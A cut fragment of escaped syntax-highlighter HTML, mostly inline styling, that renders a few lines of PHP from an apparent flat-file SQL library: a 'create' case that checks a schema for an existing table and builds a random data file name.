1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;9&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;10&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;11&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;12&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;13&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a91629720023-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;14&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 722.4px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a91629720023-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;case&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;create&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a91629720023-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbReadFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;SCHEMA&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a91629720023-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a91629720023-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;===&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a91629720023-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error6&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a91629720023-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a91629720023-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a91629720023-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileName&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;../../rbSql/rbSql_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;md5&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rand&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;10000000&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;100000000&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;16&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) 